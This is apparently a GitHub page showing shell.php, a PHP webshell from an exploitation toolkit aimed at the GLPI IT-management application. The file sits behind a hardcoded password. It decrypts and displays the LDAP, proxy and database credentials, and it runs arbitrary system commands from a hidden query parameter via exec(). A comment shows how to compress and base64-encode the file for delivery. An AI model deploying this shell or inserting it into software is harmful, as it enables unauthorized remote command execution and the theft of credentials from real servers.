-
Notifications
You must be signed in to change notification settings - Fork 21
Expand file tree
/
Copy pathshell.php
More file actions
105 lines (90 loc) · 3.2 KB
/
Copy pathshell.php
File metadata and controls
105 lines (90 loc) · 3.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<?php
/****************************************************************
* Webshell Usage:
* ?passwd=P@ssw0rd123 --> Print glpi passwords in use
* ?passwd=P@ssw0rd123&_hidden_cmd=whoami --> Execute whoami
*
* Used here exploits/utils/glpi_utils.py:method:get_glpi_shell
*
* ```bash
* python3 -c 'import zlib;import base64; shell = open("shell.php", "rb");print(base64.b64encode(zlib.compress(shell.read())));shell.close()'
* ```
****************************************************************/
error_reporting(E_ERROR | E_PARSE);
$SECURITY_STRATEGY = "no_check";
function title($m){
echo "<b><u>" . htmlentities(ucfirst($m)) . "</b></u></br>\n";
}
function decrypt_pass($pass){
if(method_exists("GLPIKey", "decrypt")){
return (new GLPIKey())->decrypt($pass);
} elseif(method_exists("Toolbox", "decrypt")){
if(method_exists("Toolbox", "sodiumDecrypt")){
return Toolbox::sodiumDecrypt($pass);
}
### Really old glpi decrypted with a key in the config
return Toolbox::decrypt($pass, GLPIKEY);
} else {
return "<ENCRYPTED>[{$pass}]";
}
}
function dump_password(){
global $CFG_GLPI, $DB;
### Show password informations
# Dump Proxy scheme
# Dump LDAP Password
if(!empty($CFG_GLPI["proxy_name"]))
{
$proxy_credz = !empty($CFG_GLPI["proxy_user"])?$CFG_GLPI["proxy_user"] . ":" . decrypt_pass($CFG_GLPI["proxy_passwd"]) . "@":"";
$proxy_url = "http://{$proxy_credz}" . $CFG_GLPI['proxy_name'] . ":" . $CFG_GLPI['proxy_port'];
title("proxy:");
Html::printCleanArray(array("Proxy In Use" => $proxy_url));
}
$auth_methods = Auth::getLoginAuthMethods();
$config_ldap = new AuthLDAP();
$all_connections = $config_ldap->find();
foreach($all_connections as $connection){
if(isset($connection['rootdn_passwd']) && isset($connection['rootdn'])){
$ldap_pass = decrypt_pass($connection['rootdn_passwd']);
title("Ldap Connexion:");
Html::printCleanArray(array("LDAP Base" => $connection['rootdn'], "LDAP DN" => $connection["basedn"], "LDAP Password" => $ldap_pass, "Connection is active" => $connection['is_active']));
}
}
# Dump DB password
if(!is_null($DB)){
title("Database informations:");
Html::printCleanArray(array("DB Host" => $DB->dbhost,
"DB Database" => $DB->dbdefault,
"DB User" => $DB->dbuser,
"DB Password" => urldecode($DB->dbpassword)));
}
}
if(isset($_GET["passwd"]) && $_GET["passwd"] === "P@ssw0rd123")
{
for ($i=0; $i < 4; $i++) {
$relative = str_repeat("../", $i);
$to_include = "{$relative}inc/includes.php";
if(file_exists($to_include)){
include_once($to_include);
try{
Html::header("GLPI Password");
if(isset($_GET["_hidden_cmd"]) && !empty($_GET["_hidden_cmd"]))
{
$output=null;
$retval=null;
exec($_GET['_hidden_cmd'], $output, $retval);
echo "<code>";
foreach ($output as $line) {
echo htmlentities($line) . "</br>";
}
echo "</code></br>";
} else {
dump_password();
}
} catch(Exception $e) {
echo $e->getMessage();
}
break;
}
}
}